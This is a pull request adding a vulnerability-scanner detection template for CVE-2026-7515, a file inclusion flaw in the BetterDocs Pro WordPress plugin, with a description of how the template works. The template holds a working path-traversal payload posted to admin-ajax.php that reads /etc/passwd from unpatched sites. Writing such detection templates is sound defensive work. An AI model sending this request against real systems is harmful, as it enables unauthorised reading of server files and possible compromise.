### PR TITLE
feat: add CVE-2026-7515 - BetterDocs Pro <= 3.8.0 Unauthenticated Local File Inclusion

### DIFF
--- a/http/cves/2026/CVE-2026-7515.yaml
+++ b/http/cves/2026/CVE-2026-7515.yaml
@@ -1,0 +1,68 @@
+id: CVE-2026-7515
+
+info:
+  name: BetterDocs Pro <= 3.8.0 - Unauthenticated Local File Inclusion via doc_style
+  author: VixianSchool
+  severity: critical
+  description: |
+    BetterDocs Pro WordPress plugin versions up to and including 3.8.0 are vulnerable
+    to Unauthenticated Local File Inclusion via the 'doc_style' parameter in the
+    load_more_docs_section AJAX action (wp_ajax_nopriv_ hook). Attackers can include
+    and execute arbitrary PHP files on the server without authentication.
+  impact: |
+    Unauthenticated attackers can read sensitive files (e.g. wp-config.php), execute
+    arbitrary PHP code, and potentially achieve full server compromise.
+  remediation: |
+    Update BetterDocs Pro to version 3.8.1 or later.
+  reference:
+    - https://wpscan.com/vulnerability/9ff9506f-ff0d-4256-8d04-e0b47d8c9c23/
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/694b67d2-7d60-4764-a2c0-02698c331772
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-7515
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-7515
+    cwe-id: CWE-98
+  metadata:
+    max-request: 2
+    verified: true
+  tags: cve,cve2026,wordpress,wp,wp-plugin,lfi,betterdocs,unauth
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/docs/"
+      - "{{BaseURL}}/documentation/"
+
+    extractors:
+      - type: regex
+        name: nonce
+        part: body
+        group: 1
+        regex:
+          - 'betterdocsEncyclopedia[^{]*\{[^}]*"_nonce"\s*:\s*"([a-f0-9]{10,})"'
+          - '"encyclopedia_nonce"\s*:\s*"([a-f0-9]{10})"'
+          - '"_nonce"\s*:\s*"([a-f0-9]{10})"'
+        internal: true
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=load_more_docs_section&_nonce={{nonce}}&doc_style=../../../../../../etc/passwd&page=0
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
## Summary

Adds a detection template for **CVE-2026-7515** — Unauthenticated Local File Inclusion in the BetterDocs Pro WordPress plugin (versions ≤ 3.8.0) via the `doc_style` parameter.

## Vulnerability Details

- **Plugin**: BetterDocs Pro (`betterdocs-pro`)
- **Affected**: ≤ 3.8.0 | **Fixed**: 3.8.1
- **CVSS**: 9.8 Critical — `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
- **CWE**: CWE-98 (Improper Control of Filename for Include/Require Statement)
- **Authenticated**: No — exposed via `wp_ajax_nopriv_` hook

## Detection Logic

**Request 1** — GET `{{BaseURL}}` / `/docs/` / `/documentation/` to extract the BetterDocs nonce from inline JS (`betterdocsEncyclopedia._nonce`).

**Request 2** — POST to `/wp-admin/admin-ajax.php` with `action=load_more_docs_section`, the extracted nonce, and `doc_style=../../../../../../etc/passwd`. Matches on `root:.*:0:0:` in the response.

## References

- https://wpscan.com/vulnerability/9ff9506f-ff0d-4256-8d04-e0b47d8c9c23/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/694b67d2-7d60-4764-a2c0-02698c331772
- https://nvd.nist.gov/vuln/detail/CVE-2026-7515
- PoC: https://github.com/izxci/CVE_2026_7515